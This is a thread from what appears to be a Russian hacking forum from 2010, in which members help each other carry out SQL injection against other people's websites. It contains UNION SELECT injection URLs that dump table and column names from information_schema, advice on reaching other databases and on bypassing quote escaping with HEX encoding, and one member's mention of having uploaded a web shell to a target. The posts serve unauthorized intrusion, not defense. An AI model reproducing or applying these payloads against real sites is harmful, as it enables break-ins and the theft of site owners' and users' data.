27.08.2010, 15:42
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
z0mbyak, шелл залил...отправил в ПМ.
Сообщение от None
там читалка,шелл залить не получится, только читать конфиги если что..
Konqi, там же не только читалка |
|
|
27.08.2010, 15:48
|
|
Новичок
Регистрация: 20.08.2010
Сообщений: 6
С нами:
8278166
Репутация:
0
|
|
Что делать если SQL-инъеция находится в БД products, а нужные данных в БД store. Можно ли из базы 1 каким нибудь запросом получить данные из базы 2.
И что делать если известны логин и пароль всей бд, но phpmyadmin найти не получается
|
|
|
|
27.08.2010, 16:48
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами:
10889431
Репутация:
34
|
|
Сообщение от DavletAG
Что делать если SQL-инъеция находится в БД products, а нужные данных в БД store. Можно ли из базы 1 каким нибудь запросом получить данные из базы 2.
И что делать если известны логин и пароль всей бд, но phpmyadmin найти не получается
Обращиние просто идёт так store.TABLE_NAME где TABLE_NAME имя таблицы.
|
|
|
|
27.08.2010, 20:19
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
С нами:
9900206
Репутация:
25
|
|
как вытащить имена полей с таблици еси например вот такой запрос сканывает:
Код:
http://www.lol.com/item.php?pid=-212+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+--+
пишу такое
Код:
http://www.lol.com/item.php?pid=-212+union+select+1,2,3,group_concat(COLUMN_NAME),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='название таблици'+limit+0+5+--+
выдает ошибку типа
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'название таблици\' limit 0 5 -- ORDER BY title ASC' at line 1
ну кроме тех пробелов в коде что добавляются шас )
че я тут неправельно пишу? |
|
|
|
27.08.2010, 20:23
|
|
Познающий
Регистрация: 14.01.2009
Сообщений: 93
С нами:
9116636
Репутация:
39
|
|
Сообщение от NorB
че я тут неправельно пишу?
Кавычки экранируются - переведи в HEX или CHAR. Перевести в HEX можно, выполнив на любом инсталле мускула SELECT CONCAT('0x', HEX('users')), вместо users пиши нужное название таблицы. Получишь строку вида 0x7573657273, ее пиши в WHERE. Еще ты неправильно пишешь слова "неправильно", "таблицы", "что" и "если".
|
|
|
|
27.08.2010, 20:26
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
С нами:
9900206
Репутация:
25
|
|
пасиба буду исправляться
|
|
|
|
28.08.2010, 12:54
|
|
Участник форума
Регистрация: 04.08.2010
Сообщений: 147
С нами:
8301206
Репутация:
-2
|
|
Извиняюсь за ламерский вопрос, но давно меня интересует: если сайт на чистом html, можно его взломать или нереально? Без всяких гостевых, полей для ввода каких-то данных -только хтмл страницы отдельные.
|
|
|
|
28.08.2010, 13:24
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Flisk
Извиняюсь за ламерский вопрос, но давно меня интересует: если сайт на чистом html, можно его взломать или нереально? Без всяких гостевых, полей для ввода каких-то данных -только хтмл страницы отдельные.
Нельзя...
|
|
|
|
28.08.2010, 14:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
[offtop]
-PRIVAT-, в этой теме ты пока что только читай.
[/offtop]
|
|
|
|
28.08.2010, 16:16
|
|
Познающий
Регистрация: 20.07.2007
Сообщений: 99
С нами:
9900206
Репутация:
25
|
|
Объясните 1 вещь: я нашел инъекцию делаю запрос на вывод всех имен таблиц из INFORMATION_SCHEMA.tables но там не оказывается одной таблицы которая вываливается в ошибке когда проверяю инъекцию. Могу просматривать таблицу и тп.
Вопрос в том почему ее названия нету в INFORMATION_SCHEMA.tables ?
и походу вообще пользовательские таблицы не выводятся..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
